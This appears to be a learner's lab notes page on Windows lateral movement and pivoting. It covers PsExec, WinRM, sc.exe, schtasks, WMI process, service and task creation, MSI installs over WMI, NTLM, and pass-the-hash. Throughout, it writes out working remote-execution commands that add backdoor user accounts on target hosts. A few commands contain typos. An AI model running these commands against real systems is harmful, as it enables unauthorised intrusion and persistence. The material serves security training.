Lateral Movement & Pivoting

Common techniques used to move laterally across a Windows network.

Spawning Processes Remotely

Psexec

• Ports: 445/TCP(SMB)

• Required Group Memberships: Administrators

PSExec is the go-to for needing to execute a process remotely. PSExec is one of the Sys Internals tools. PSExec works as follows:

1. Connect and upload the PSEXEC service executable (PSEXESVC.exe)

2. Create and execute a service named PSEXESVC and associate this with C:\Windows\psexesvc.exe

3. Create named pipes to handle stdin/stdout/stderr.

To run PSExec, the administrator credentials for the remote host and the command you wish to run are required.

Remote Process Creation Using WinRM

• Ports: 5985/TCP(WinRM HTTP) or 5986(WinRM HTTPS)

• Required Group Memberships: Remote Management Users

Windows Remote Management is a web-based protocol for sending PowerShell commands to hosts remotely, many Windows Server installations run this by default. The following command will connect to a remote Powershell session:

winrs.exe -u:Administrator -p:Password -r:target cmd

The same can be achieved with Powershell, however, to pass different credentials a PSCredential object will need to be created:

$username = 'Administrator'
$password = 'Password'
$securePassword = ConvertTo-SecureString $password -AsPlainText -Force
$credential = New-Object System.Management.Automation.PSCredential $username, $securePassword;

Enter-PSSession -Computername <TARGET> -Credential $credential

Invoke-Command -Computername <TARGET> -Credential $credential -ScriptBlock {whoami}

Remotely Creating Services Using SC

• Ports: 135/TCP, 49152-65535/TCP (DCE/RPC) or 445/TCP (RPC over SMB Named Pipes) or 139/TCP (RPC over SMB Named Pipes)

• Required Group Memberships: Administrators

Windows services can be used to run arbitrary commands, if a Windows service is configured to run an application, it will execute the application and fail afterwards. A service can be created on a remote host with sc.exe - a standard tool built into Windows.

When using sc, it will try to connect to the Service Control Manager (SVCCTL) remote service program through RPC in several ways:

1. A connection attempt is made using DCE/RPC. The client connects to the Endpoint Mapper (EPM) on port 135 which catalogues available RPC endpoints and requests information on the SVCCTL program. The EPM then responds with the IP and port to connect to SVCCTL, normally a dynamic port in the range of 49152-65535.

2. If the latter connection fails, it will try to reach SVCCTL via named SMB names pipes, on port 445 or 139.

The following commands would create a service called spooky:

sc.exe \\TARGET create Spooky binPath= "net user contrxl Pass /add" start= auto
sc.exe \\TARGET start Spooky

Once the service starts, the net user command will execute, to stop and delete the service:

sc.exe \\TARGET stop Spooky
sc.exe \\TARGET delete Spooky

Creating Scheduled Tasks Remotely

Scheduled Tasks can be created and run remotely using schtasks, to create a task named Spooky:

schtasks /s TARGET RU "SYSTEM" /create /tn "Spooky" /tr "cmd" /sc ONCE /sd 01/01/1970 /st 00:00

schtasks /s TARGET /run /TN "Spooky"

schtasks /s TARGET /TN "Spooky" /DELETE /F

Connecting to WMI from PowerShell

Before connecting to WMI (Windows Management Instrumentation) with PowerShell, a PSCredential object must be created with our username and password. This can be created as follows:

$username = 'Administrator';
$password = 'Password';
$securePassword = Convert-ToSecureString $password -AsPlainTet -Force;
$credential = New-Object System.Management.Automation.PSCredential $username, $securePassword;

A WMI session can be created using one of the following protocols:

• DCOM: RPC over IP using port 135/TCP and ports 49152/65535/TCP

• Wsman: WinRM for connecting using ports 5985/TCP (WinRM HTTP) or 5986/TCP (WinRM HTTPS)

To establish a WMI session from PowerShell, we use the following:

$Opt = New-CimSessionOption -Protocol DCOM
$Session = New-CimSession -ComputerName TARGET -Credential $credential -SessionOption $Opt -ErrorAction Stop

Remote Process Creation Using WMI

• Ports: 135/TCP, 49152-65535/TCP (DCERPC), 5985/TCP (WinRM HTTP) or 5986 (WinRM HTTPS)

• Required Group Memberships: Administrators

A process can be remotely spawned from PowerShell by leveraging WMI, sending a WMI request to the Win32_Process class to spawn the process under the session we created before:

$command = "powershell.exe -Command Set-Content -Path C:\text.txt -Value contrxl";
Invoke-CimMethod -CimSession $Session -ClassName Win32_Process -MethodName Create
-Arguments @{
CommandLine = $command
}

WMI won't let you see the output of any command and will create the required process silently, on legacy systems, this can be done from CMD with WMIC:

wmic.exe /user:Administrator /password:Mypass123 /node:TARGET process call create "cmd.exe /c calc.exe" 

Creating Services Remotely with WMI

• Ports: 135/TCP, 49152-65535/TCP (DCERPC), 5985/TCP (WinRM HTTP) or 5986/TCP (WinRM HTTPS)

• Required Group Memberships: Administrators

To create a service called "contrxl":

Invoke-CimMethod -CimSession $Session -ClassName Win32_Service -MethodName Create -Arguments @{
Name = "contrxl";
DisplayName = "contrxl";
PathName = "net user contrxl Pass123 /add"; # Your payload
ServiceType = [byte]::Parse("16"); # Win32OwnProcess : Start service in a new process
StartMode = "Manual"
}

Then, we can handle the service and start it using:

$Service = Get-CimInstance -CimSession $Session -ClassName Win32_Service -filter "Name LIKE 'contrxl'"

Invoke-CimMethod -InputObject $Service -MethodName StartService

Finally, the service can be stopped and deleted with:

Invoke-CimMethod -InputObject $Service -MethodName StopService
Invoke-CimMethod -InputObject $Service -MethodName Delete

Creating Scheduled Tasks Remotely with WMI

• Ports: 135/TCP, 49152-65535/TCP (DCERPC), 5985/TCP (WinRM HTTP) or 5986/TCP (WinRM HTTPS)

• Required Group Memberships: Administrators

To create and execute a scheduled task:

# Payload must be split in Command and Args
$Command = "cmd.exe"
$Args = "/c net user contrxl aSdf1234 /add"

$Action = New-ScheduledTaskAction -CimSession $Session -Execute $Command -Argument $Args
Register-ScheduledTask -CimSession $Session -Action $Action -User "NT AUTHORITY\SYSTEM" -TaskName "THMtask2"
Start-ScheduledTask -CimSession $Session -TaskName "contrxl"

And then to delete the task once done:

Unregister-ScheduledTask -CimSession $Session -TaskName "contrxl"

Installing MSI Packages Through WMI

• Ports: 135/TCP, 49152-65535/TCP (DCERPC), 5985/TCP (WinRM HTTP) or 5986/TCP (WinRM HTTPS)

• Required Group Memberships: Administrators

If an MSI package is copied to the target system, WMI can be used to attempt to install it using:

Invoke-CimMethod -CimSession $Session -ClassName Win32_Product -MethodName Install -Arguments @{PackageLocation = "C:\Windows\myinstaller.msi"; Options = ""; AllUsers = $false}

This can be achieved on legacy systems with:

wmic /node:TARGET /user:DOMAIN\USER product call install PackageLocation=c:\Windows\myinstaller.msi

Use of Alternate Authentication Material

Alternate authentication material refers to a piece of data which can be used to access a Windows account without the password. This is possible because of how some Windows authentication protocols work like NTLM and Kerberos.

NTLM authentication works as follows:

1. Client sends authentication request to the server they want to access

2. Server generates a random number and sends it as a challenge to the client

3. Client combines his NTLM password hash with challenge (and other known data) to generate a response to the challenge and sends it back to the server for verification.

4. Server forwards both the challenge and response to the Domain Controller for verification

5. Domain Controller uses the challenge to recalculate the response and compares it to the initial client request. If they match, the client is authenticated, otherwise access is denied.

6. The server forwards the authentication result to the client.

Pass-the-Hash

When extracting credentials from a host where we have administrative privileges we may end up with non-cracked NTLM hashes. These can be used in a pass-the-hash attack to successfully authenticate without the actual password. Hash extraction can be performed using something like mimikatz to read the local SAM or extract hashes from LSASS.